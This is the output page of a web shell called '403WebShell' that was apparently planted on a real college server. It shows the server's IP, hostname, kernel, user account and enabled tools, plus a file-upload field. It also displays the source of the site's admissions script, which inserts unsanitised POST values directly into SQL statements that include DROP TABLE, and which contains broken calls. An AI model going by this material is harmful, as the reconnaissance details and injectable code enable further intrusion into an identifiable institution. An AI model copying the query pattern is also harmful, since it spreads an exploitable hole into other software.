403WebShell

403Webshell

Server IP : 172.64.80.1 / Your IP : 172.71.120.136
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF
Directory : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admissionProcess/

Upload File :

[ Back ]

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/admissionProcess/admittedList_details.php

<?php
session_start();
 $dept=$_POST['dept'];
 $batchName=$_POST['batchName'];
 $levelName=$_POST['levelName'];
//die();
if ($levelName=='National Diploma (Full Time)') { $table='vw_stddata_utmeform'; $aa='nd_ft';}
if ($levelName=='National Diploma (Daily Part Time)') { $table='vw_stddata_pts'; $aa='nd_dpt';}
if ($levelName=='National Diploma (Regular Part Time)') {$table='vw_stddata_pts'; $aa='nd_rpt';}
if ($levelName=='Higher National Diploma (Full Time)') {$table='	vw_stddata_hnd'; $aa='hnd_ft';}
if ($levelName=='Higher National Diploma (Daily Part Time)') {$table='vw_stddata_hnd'; $aa='hnd_dpt';}
//show status like '%connected%';

	include("SpreadsheetAPI_pdo.php");
	function recordSetToJson($mysql_result,$jsonencode=false,$marker="") {
		$return_arr = array();
		while($datarow = mysql_fetch_assoc($mysql_result)){
			$return_arr[] = $datarow;
		}   		
		if (!$jsonencode)	
			return $return_arr;
		else{
			if ($marker != "")
				return json_encode(array($marker =>$return_arr));			
			else
				return json_encode($return_arr);
		}
	}
	//
	$filename = $aa.'_'.$dept.'_'.$batchName.".xls";

		require('../connect.php');
        $db=db_connect();
		if (isset($_REQUEST['VIEW']) && $_REQUEST['VIEW']=='TRUE'){
            $Query="select * from stddata";
		}else{
          //  $Query = "SELECT * from vwAllPayments order by paymentType";

            /*$Query1 = $db->query("DROP TABLE IF EXISTS export2016_17; CREATE TABLE export2016_17 (SELECT a.matNo, d.formNo, a.names, a.course, a.levelID, orderID, remitaRRR, transDate, amtPaid, paymentType, transApproved, remark, d.status
FROM remitaorder b, realdata a
LEFT JOIN rawcgpa c ON a.matNo = c.matNo
LEFT JOIN admitted d ON a.formNo = d.formNo
WHERE (
a.matNo = b.regNo
OR a.formNo = b.regNo
)
AND transApproved = 'True' and MONTH(transDate) = '$mt' and Year(TransDate) = '$yr' group by b.remitaRRR order by b.paymentType)");
*/
             if ($batchName=='All List'){
                 $aspoa="DROP TABLE IF EXISTS admitted_details_temp; CREATE TABLE admitted_details_temp (select * from ".$table." where formNo in (select formNo from stddata where admStatus=3 and course='$dept')) order by names";
             }else{
                 $aspoa="DROP TABLE IF EXISTS admitted_details_temp; CREATE TABLE admitted_details_temp (select * from ".$table." where formNo in (select formNo from stddata where admStatus=3 and batchNo='$batchName' and course='$dept')) order by names";
             }
             $Query=$db->query($aspoa);
        }
//die();

		if (isset($_REQUEST['JSON'])){
            $result = $db->query($Query);
            if ($result->rowCount() == 0)
				echo "NOT_FOUND";
			else

				echo recordSetToJson($results,true);
		}else {
            //$result=$result1->fetchAll(PDO::FETCH_BOTH);
            // $result=mysql_query($Query,$db);
            //echo 'here';
            // $result = $db->query($Query);

            xlsProcess($filename);
            exit;
        }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit